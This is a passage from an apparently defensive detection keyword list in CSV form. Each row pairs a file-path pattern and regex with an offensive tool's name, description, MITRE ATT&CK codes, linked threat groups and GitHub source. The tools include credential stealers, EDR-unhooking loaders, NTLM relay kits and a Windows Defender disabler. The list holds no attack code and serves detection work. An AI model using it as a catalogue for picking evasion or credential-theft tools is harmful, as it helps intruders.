"*/NoPowerShell/*",".{0,1000}\/NoPowerShell\/.{0,1000}","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","1","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","9240"
"*/norouteconfig.sh*",".{0,1000}\/norouteconfig\.sh.{0,1000}","offensive_tool_keyword","TunnelVision","TunnelVision uses DHCP option 121 to manipulate routing tables and decloak VPN traffic","T1557 - T1498.003","TA0009 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/leviathansecurity/TunnelVision","1","1","N/A","N/A","9","2","132","17","2024-05-08T19:40:13Z","2024-03-11T22:24:56Z","9241"
"*/noseyparker.git*",".{0,1000}\/noseyparker\.git.{0,1000}","offensive_tool_keyword","noseyparker","Nosey Parker is a command-line program that finds secrets and sensitive information in textual data and Git history.","T1583 - T1059.001 - T1059.003","TA0002 - TA0003 - TA0040","N/A","N/A","Credential Access","https://github.com/praetorian-inc/noseyparker","1","1","N/A","N/A","8","10","1903","100","2025-03-07T20:15:34Z","2022-11-08T23:09:17Z","9242"
"*/NotQuite0DayFriday/zip/trunk*",".{0,1000}\/NotQuite0DayFriday\/zip\/trunk.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","#linux","N/A","10","10","5909","1133","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z","9243"
"*/NovaLdr.exe",".{0,1000}\/NovaLdr\.exe","offensive_tool_keyword","NovaLdr","NovaLdr is a Threadless Module Stomping written in Rust designed as a learning project while exploring the world of malware development. It uses advanced techniques like indirect syscalls and string encryption to achieve its functionalities","T1027.001 - T1055.012 - T1112 - T1574.002 - T1055 - T1056.002 - T1027.002 - T1070.004 - T1129","TA0004 - TA0005 - TA0040 - TA0011","N/A","N/A","Defense Evasion","https://github.com/BlackSnufkin/NovaLdr","1","1","N/A","N/A","10","3","242","40","2024-06-29T10:34:48Z","2023-10-19T07:54:39Z","9244"
"*/NovaLdr.git*",".{0,1000}\/NovaLdr\.git.{0,1000}","offensive_tool_keyword","NovaLdr","NovaLdr is a Threadless Module Stomping written in Rust designed as a learning project while exploring the world of malware development. It uses advanced techniques like indirect syscalls and string encryption to achieve its functionalities","T1027.001 - T1055.012 - T1112 - T1574.002 - T1055 - T1056.002 - T1027.002 - T1070.004 - T1129","TA0004 - TA0005 - TA0040 - TA0011","N/A","N/A","Defense Evasion","https://github.com/BlackSnufkin/NovaLdr","1","1","N/A","N/A","10","3","242","40","2024-06-29T10:34:48Z","2023-10-19T07:54:39Z","9245"
"*/NoveLdr.exe",".{0,1000}\/NoveLdr\.exe","offensive_tool_keyword","NovaLdr","NovaLdr is a Threadless Module Stomping written in Rust designed as a learning project while exploring the world of malware development. It uses advanced techniques like indirect syscalls and string encryption to achieve its functionalities","T1027.001 - T1055.012 - T1112 - T1574.002 - T1055 - T1056.002 - T1027.002 - T1070.004 - T1129","TA0004 - TA0005 - TA0040 - TA0011","N/A","N/A","Defense Evasion","https://github.com/BlackSnufkin/NovaLdr","1","1","N/A","N/A","10","3","242","40","2024-06-29T10:34:48Z","2023-10-19T07:54:39Z","9246"
"*/noVNC/index.html*",".{0,1000}\/noVNC\/index\.html.{0,1000}","offensive_tool_keyword","EvilnoVNC","EvilnoVNC is a Ready to go Phishing Platform","T1566 - T1110 - T1555 - T1204 - T1592","TA0001 - TA0006 - TA0009","N/A","N/A","Phishing","https://github.com/ms101/EvilKnievelnoVNC","1","0","#linux","N/A","9","1","44","8","2025-03-08T19:34:41Z","2024-04-13T22:05:04Z","9247"
"*/noVNC/utils/novnc_proxy*",".{0,1000}\/noVNC\/utils\/novnc_proxy.{0,1000}","offensive_tool_keyword","EvilnoVNC","EvilnoVNC is a Ready to go Phishing Platform","T1566 - T1110 - T1555 - T1204 - T1592","TA0001 - TA0006 - TA0009","N/A","N/A","Phishing","https://github.com/JoelGMSec/EvilnoVNC","1","0","#linux","N/A","9","10","960","169","2025-03-04T15:59:27Z","2022-09-04T10:48:49Z","9248"
"*/noVNC/vnc_lite.html*",".{0,1000}\/noVNC\/vnc_lite\.html.{0,1000}","offensive_tool_keyword","EvilnoVNC","EvilnoVNC is a Ready to go Phishing Platform","T1566 - T1110 - T1555 - T1204 - T1592","TA0001 - TA0006 - TA0009","N/A","N/A","Phishing","https://github.com/ms101/EvilKnievelnoVNC","1","0","#linux","N/A","9","1","44","8","2025-03-08T19:34:41Z","2024-04-13T22:05:04Z","9249"
"*/nowsecure/dirtycow*",".{0,1000}\/nowsecure\/dirtycow.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirtycow vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tool","https://github.com/nowsecure/dirtycow","1","1","N/A","N/A","N/A","1","93","25","2019-05-13T13:17:31Z","2016-10-22T14:00:37Z","9250"
"*/nping-brute.nse*",".{0,1000}\/nping\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","9251"
"*/NPPSPY.dll*",".{0,1000}\/NPPSPY\.dll.{0,1000}","offensive_tool_keyword","NPPSpy","Simple code for NPLogonNotify(). The function obtains logon data including cleartext password","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/gtworek/PSBits/blob/master/PasswordStealing/NPPSpy","1","1","N/A","N/A","10","10","3337","542","2025-03-12T19:59:23Z","2019-06-29T13:22:36Z","9252"
"*/NPPSpy.exe*",".{0,1000}\/NPPSpy\.exe.{0,1000}","offensive_tool_keyword","NPPSpy","Simple code for NPLogonNotify(). The function obtains logon data including cleartext password","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/gtworek/PSBits/blob/master/PasswordStealing/NPPSpy","1","1","N/A","N/A","10","10","3337","542","2025-03-12T19:59:23Z","2019-06-29T13:22:36Z","9253"
"*/nps/releases/download/*",".{0,1000}\/nps\/releases\/download\/.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","1","N/A","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","9254"
"*/nps_payload.git*",".{0,1000}\/nps_payload\.git.{0,1000}","offensive_tool_keyword","nps_payload","This script will generate payloads for basic intrusion detection avoidance","T1027 - T1027.005 - T1055 - T1211","TA0005 - TA0004","N/A","N/A","Exploitation tool","https://github.com/trustedsec/nps_payload","1","1","N/A","N/A","9","5","442","123","2023-11-30T09:24:13Z","2017-07-23T17:01:19Z","9255"
"*/nrpc.py*",".{0,1000}nrpc\.py.{0,1000}","offensive_tool_keyword","zerologon","Zerologon CVE exploitation","T1210 - T1072","TA0008","N/A","Dispossessor","Exploitation tool","https://github.com/michaelpoznecki/zerologon","1","0","N/A","N/A","N/A","1","10","4","2020-09-15T16:31:59Z","2020-09-15T05:32:24Z","9256"
"*/nrpe-enum.nse*",".{0,1000}\/nrpe\-enum\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","9257"
"*/nsa-rules.git*",".{0,1000}\/nsa\-rules\.git.{0,1000}","offensive_tool_keyword","nsa-rules","Password cracking rules and masks for hashcat that I generated from cracked passwords.","T1110.002 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/NSAKEY/nsa-rules","1","1","N/A","N/A","10","6","547","125","2017-01-03T11:53:25Z","2016-02-15T20:49:32Z","9258"
"*/nsocks.dll*",".{0,1000}\/nsocks\.dll.{0,1000}","offensive_tool_keyword","nsocks",".NET HttpClient proxy handler implementation for SOCKS proxies","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Scattered Spider* - Black Basta","C2","https://github.com/bbepis/Nsocks","1","1","N/A","N/A","8","10","3","0","2020-06-08T17:25:07Z","2020-03-28T09:00:22Z","9261"
"*/NSocks.exe*",".{0,1000}\/NSocks\.exe.{0,1000}","offensive_tool_keyword","nsocks",".NET HttpClient proxy handler implementation for SOCKS proxies","T1090.002 - T1090 - T1071.001 - T1572","TA0011 - TA0005","N/A","Scattered Spider* - Black Basta","C2","https://github.com/bbepis/NSocks","1","1","N/A","N/A","9","10","3","0","2020-06-08T17:25:07Z","2020-03-28T09:00:22Z","9262"
"*/NSocks.git*",".{0,1000}\/NSocks\.git.{0,1000}","offensive_tool_keyword","nsocks",".NET HttpClient proxy handler implementation for SOCKS proxies","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Scattered Spider* - Black Basta","C2","https://github.com/bbepis/Nsocks","1","1","N/A","N/A","8","10","3","0","2020-06-08T17:25:07Z","2020-03-28T09:00:22Z","9263"
"*/NSudo.bat*",".{0,1000}\/NSudo\.bat.{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper protection  - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","1","N/A","N/A","10","10","1530","316","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z","9266"
"*/NSudo.exe*",".{0,1000}\/NSudo\.exe.{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper protection  - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","1","N/A","N/A","10","10","1530","316","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z","9267"
"*/NSudo.exe*",".{0,1000}\/NSudo\.exe.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","1","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","9268"
"*/NSudoG.exe*",".{0,1000}\/NSudoG\.exe.{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper protection  - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","0","N/A","N/A","10","10","1530","316","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z","9269"
"*/ntapphelpcachecontrol*",".{0,1000}\/ntapphelpcachecontrol.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","0","#linux","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","9270"
"*/ntdissector.git*",".{0,1000}\/ntdissector\.git.{0,1000}","offensive_tool_keyword","ntdissector","Ntdissector is a tool for parsing records of an NTDS database. Records are dumped in JSON format and can be filtered by object class.","T1003.003","TA0006 ","N/A","N/A","Credential Access","https://github.com/synacktiv/ntdissector","1","1","N/A","N/A","9","2","139","17","2024-08-16T14:18:35Z","2023-09-05T12:13:47Z","9271"
"*/ntdissector/*",".{0,1000}\/ntdissector\/.{0,1000}","offensive_tool_keyword","ntdissector","Ntdissector is a tool for parsing records of an NTDS database. Records are dumped in JSON format and can be filtered by object class.","T1003.003","TA0006 ","N/A","N/A","Credential Access","https://github.com/synacktiv/ntdissector","1","0","#linux","N/A","9","2","139","17","2024-08-16T14:18:35Z","2023-09-05T12:13:47Z","9272"
"*/ntdll_unhooking.exe*",".{0,1000}\/ntdll_unhooking\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002  - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","1","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","9273"
"*/ntdll_unhooking.exe*",".{0,1000}\/ntdll_unhooking\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002  - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","1","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","9274"
"*/ntdlll-unhooking-collection*",".{0,1000}\/ntdlll\-unhooking\-collection.{0,1000}","offensive_tool_keyword","ntdlll-unhooking-collection","unhooking ntdll from disk - from KnownDlls - from suspended process - from remote server (fileless)","T1055 - T1055.001 - T1070 - T1070.004 - T1101 - T1574 - T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/ntdlll-unhooking-collection","1","1","N/A","N/A","9","2","188","38","2023-08-02T02:26:33Z","2023-02-07T16:54:15Z","9275"
"*/NTDLLReflection.git*",".{0,1000}\/NTDLLReflection\.git.{0,1000}","offensive_tool_keyword","NTDLLReflection","Bypass Userland EDR hooks by Loading Reflective Ntdll in memory from a remote server based on Windows ReleaseID to avoid opening a handle to ntdll and trigger exported APIs from the export table","T1055.012 - T1574.002 - T1027.001 - T1218.011","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/NTDLLReflection","1","1","N/A","N/A","9","3","293","45","2023-08-02T02:21:43Z","2023-02-03T17:12:33Z","9276"
"*/NtdllUnpatcher.git*",".{0,1000}\/NtdllUnpatcher\.git.{0,1000}","offensive_tool_keyword","NtdllUnpatcher","code for EDR bypassing","T1070.004 - T1055.001 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Signal-Labs/NtdllUnpatcher","1","1","N/A","N/A","10","2","150","33","2019-03-07T11:10:40Z","2019-03-07T10:20:19Z","9277"
"*/ntds_dump_*.txt*",".{0,1000}\/ntds_dump_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","9278"
"*/ntdsuseraccount.py*",".{0,1000}\/ntdsuseraccount\.py.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","1","N/A","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","9279"
"*/ntdsutil.py*",".{0,1000}\/ntdsutil\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","1","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","9280"
"*/ntfs-read.py*",".{0,1000}\/ntfs\-read\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","9281"
"*/NTHASH-FPC.git*",".{0,1000}\/NTHASH\-FPC\.git.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","1","N/A","N/A","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","9282"
"*/ntlm.py*",".{0,1000}\/ntlm\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","9283"
"*/ntlmdecoder.py*",".{0,1000}\/ntlmdecoder\.py.{0,1000}","offensive_tool_keyword","CredMaster","CredKing password spraying tool - uses FireProx APIs to rotate IP addresses","T1110.003 - T1596 - T1071.004 - T1621","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/knavesec/CredMaster","1","1","N/A","N/A","9","10","1070","142","2025-03-19T20:36:21Z","2020-09-25T20:57:42Z","9284"
"*/ntlmdecoder.py*",".{0,1000}\/ntlmdecoder\.py.{0,1000}","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient","T1110 - T1078 - T1133 - T1061 - T1621","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","1","N/A","N/A","10","10","1491","269","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z","9285"
"*/NTLMInjector.git*",".{0,1000}\/NTLMInjector\.git.{0,1000}","offensive_tool_keyword","NTLMInjector","restore the user password after a password reset (get the previous hash with DCSync)","T1555 - T1556.003 - T1078 - T1110.003 - T1201 - T1003","TA0001 - TA0003 - TA0004 - TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/vletoux/NTLMInjector","1","1","N/A","N/A","10","2","167","29","2017-06-08T19:01:21Z","2017-06-04T07:25:36Z","9286"
"*/NTLMParse.go*",".{0,1000}\/NTLMParse\.go.{0,1000}","offensive_tool_keyword","ADFSRelay","NTLMParse is a utility for decoding base64-encoded NTLM messages and printing information about the underlying properties and fields within the message. Examining these NTLM messages is helpful when researching the behavior of a particular NTLM implementation. ADFSRelay is a proof of concept utility developed while researching the feasibility of NTLM relaying attacks targeting the ADFS service. This utility can be leveraged to perform NTLM relaying attacks targeting ADFS","T1140 - T1212 - T1557","TA0007 - TA0008 - TA0006","N/A","Black Basta","Credential Access","https://github.com/praetorian-inc/ADFSRelay","1","1","N/A","N/A","10","2","179","15","2022-06-22T03:01:00Z","2022-05-12T01:20:14Z","9287"
"*/ntlmquic*",".{0,1000}\/ntlmquic.{0,1000}","offensive_tool_keyword","ntlmquic","POC tools for exploring SMB over QUIC protocol","T1210.002 - T1210.003 - T1210.004","TA0001","N/A","N/A","Exploitation tool","https://github.com/xpn/ntlmquic","1","1","N/A","network exploitation tool","6","2","122","15","2022-04-06T11:22:11Z","2022-04-05T13:01:02Z","9288"
"*/NTLMRecon*",".{0,1000}\/NTLMRecon.{0,1000}","offensive_tool_keyword","NTMLRecon","A fast and flexible NTLM reconnaissance tool without external dependencies. Useful to find out information about NTLM endpoints when working with a large set of potential IP addresses and domains","T1595","TA0009","N/A","N/A","Discovery","https://github.com/pwnfoo/NTLMRecon","1","1","N/A","N/A","N/A","5","481","70","2024-06-24T18:11:12Z","2019-12-01T06:06:30Z","9289"
"*/NTLMRecon.git*",".{0,1000}\/NTLMRecon\.git.{0,1000}","offensive_tool_keyword","NTMLRecon","Enumerate information from NTLM authentication enabled web endpoints","T1212 - T1212.001 - T1071 - T1071.001 - T1087 - T1087.001","TA0009 - TA0007 - TA0006","N/A","N/A","Discovery","https://github.com/puzzlepeaches/NTLMRecon","1","1","N/A","N/A","8","1","35","3","2023-08-16T14:34:10Z","2023-08-09T12:10:42Z","9290"
"*/ntlmrecon/*.py*",".{0,1000}\/ntlmrecon\/.{0,1000}\.py.{0,1000}","offensive_tool_keyword","NTMLRecon","Enumerate information from NTLM authentication enabled web endpoints","T1212 - T1212.001 - T1071 - T1071.001 - T1087 - T1087.001","TA0009 - TA0007 - TA0006","N/A","N/A","Discovery","https://github.com/puzzlepeaches/NTLMRecon","1","1","N/A","N/A","8","1","35","3","2023-08-16T14:34:10Z","2023-08-09T12:10:42Z","9291"
"*/NTLMRelay2Self*",".{0,1000}\/NTLMRelay2Self.{0,1000}","offensive_tool_keyword","NTLMRelay2Self","An other No-Fix LPE - NTLMRelay2Self over HTTP (Webdav).","T1078 - T1078.004 - T1557 - T1557.001 - T1068","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/med0x2e/NTLMRelay2Self","1","1","N/A","N/A","10","5","400","42","2024-01-27T08:52:03Z","2022-04-30T10:05:02Z","9292"
"*/NtlmRelayToEWS.git*",".{0,1000}\/NtlmRelayToEWS\.git.{0,1000}","offensive_tool_keyword","NtlmRelayToEWS","ntlmRelayToEWS is a tool for performing ntlm relay attacks on Exchange Web Services (EWS)","T1212 - T1557 - T1040 - T1078","TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/Arno0x/NtlmRelayToEWS","1","1","N/A","N/A","10","4","331","60","2018-01-15T12:48:02Z","2017-10-13T18:00:50Z","9293"
"*/NtlmRelayToEWS/*",".{0,1000}\/NtlmRelayToEWS\/.{0,1000}","offensive_tool_keyword","NtlmRelayToEWS","ntlmRelayToEWS is a tool for performing ntlm relay attacks on Exchange Web Services (EWS)","T1212 - T1557 - T1040 - T1078","TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/Arno0x/NtlmRelayToEWS","1","1","N/A","N/A","10","4","331","60","2018-01-15T12:48:02Z","2017-10-13T18:00:50Z","9294"
"*/ntlmrelayx.exe*",".{0,1000}\/ntlmrelayx\.exe.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","9295"
"*/ntlmrelayx.exe*",".{0,1000}\/ntlmrelayx\.exe.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","9296"
"*/ntlmrelayx.py*",".{0,1000}\/ntlmrelayx\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","9297"
